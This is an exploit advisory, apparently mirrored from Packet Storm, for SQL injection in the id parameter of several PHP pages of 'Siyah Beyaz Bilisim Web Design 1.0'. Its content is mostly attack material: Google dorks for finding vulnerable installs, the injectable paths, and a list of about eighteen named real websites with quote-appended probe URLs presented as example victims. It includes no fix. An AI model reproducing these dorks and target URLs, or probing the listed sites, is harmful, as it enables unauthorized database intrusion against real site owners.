Siyah Beyaz Bilisim Web Design 1.0 SQL Injection

🗓️ 03 Dec 2018 00:00:00Reported by KingSkrupellosType

packetstorm🔗 packetstormsecurity.com👁 35 Views

Siya Beyaz Bilisim Web Design 1.0 SQL Injection vulnerability discovered by KingSkrupellos from Cyberizm Digital Security Army. Exploitable pages include yazi.php, resimler.php, and sayfa.php

`#################################################################################################  
  
# Exploit Title : Siyah Beyaz BiliAim Web Design 1.0 SQL Injection  
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security  
Army  
# Date : 02/12/2018  
# Vendor Homepage : siyahbeyazbilisim.com  
# Software Download Link : N/A  
# Tested On : Windows and Linux  
# Category : WebApps  
# Version Information : 1.0  
# Exploit Risk : Medium  
# # Google Dorks :  
intext:''TasarA+-m ve Kodlama Siyah Beyaz BiliAim tarafA+-ndan yapA+-lmA+-AtA+-r.''  
intext:''TasarA+-m ve Kodlama SiyahBeyazBiliAim tarafA+-ndan yapA+-lmA+-AtA+-r.''  
# CxSecurity Exploit Link : cxsecurity.com/ascii/WLB-2018110203  
# Exploit4Arab Exploit Link : exploit4arab.org/exploits/2261  
# Exploit4Arab Exploit Link : exploitalert.com/view-details.html?id=31533  
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL  
Command ('SQL Injection') ]  
  
#################################################################################################  
  
# SQL Injection Exploit :  
  
/yazi.php?id=[SQL Injection]  
  
/resimler.php?id=[SQL Injection]  
  
/sayfa.php?id=[SQL Injection]  
  
/grup.php?id=[SQL Injection]  
  
/haber.php?id=[SQL Injection]  
  
/slider.php?id=[SQL Injection]  
  
/sube.php?id=[SQL Injection]  
  
/duyurular.php?id=[SQL Injection]  
  
#################################################################################################  
  
# Example Vulnerable Sites =>  
  
[+] aydincdm.org/yazi.php?id=5%27 => [ Proof of Concept ] =>  
archive.is/cABYo  
  
[+] sevennakliyat.com/resimler.php?id=3%27  
  
[+] tucanteknik.com/sayfa.php?id=110%27  
  
[+] turenyapi.com/grup.php?id=16%27  
  
[+] saranlar.com/sube.php?id=2%27  
  
[+] semirauto.com/grup.php?id=1%27  
  
[+] aydinkompresor.net/kurumsal.php?id=4%27  
  
[+] simgepastacilik.com/grup.php?id=12%27  
  
[+] kocarlitarispamuk.com/grup.php?id=4%27  
  
[+] royalmarine.com.tr/grup.php?id=2%27  
  
[+] didimsanatakademisi.com/album.php?id=12%27  
  
[+] dundarlarparke.com/grup.php?id=6%27  
  
[+] aykimsan.com.tr/grup.php?id=22%27  
  
[+] lilacambalkon.com/resimler.php?id=7%27  
  
[+] avrupakulturakademi.com/sayfa.php?id=1%27  
  
[+] novasluxe.com/sayfa.php?id=21%27  
  
[+] megafit.com.tr/resimler.php?id=3%27  
  
[+] dogrugunespaneli.com/grup.php?id=6%27  
  
#################################################################################################  
  
# Example SQL Database Error :  
  
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result  
resource in /home/adsyb/public_html/yazi.php on line 5  
  
#################################################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team  
  
#################################################################################################  
`

03 Dec 2018 00:00Current

0.4Low risk

Vulners AI Score0.4